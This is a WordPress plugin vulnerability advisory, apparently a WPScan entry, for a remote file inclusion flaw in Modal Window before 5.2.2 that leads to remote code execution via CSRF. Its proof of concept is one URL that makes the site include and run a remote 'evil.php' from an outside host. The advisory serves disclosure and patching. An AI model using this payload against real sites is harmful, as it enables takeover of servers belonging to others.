How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

Modal Window < 5.2.2 - RFI leading to RCE via CSRF

Description

The plugin within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.

Proof of Concept

http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F

PHP's allow_url_include must be set to "On"

Affects Plugins

Fixed in version 5.2.2

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2641645/modal-window

Classification

Type

RCE

OWASP top 10

CWE

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

566ff8dc-f820-412b-b2d3-fa789bce528e

Timeline

Publicly Published

2021-12-05 (about 1 years ago)

Added

2021-12-09 (about 1 years ago)

Last Updated

2022-04-11 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin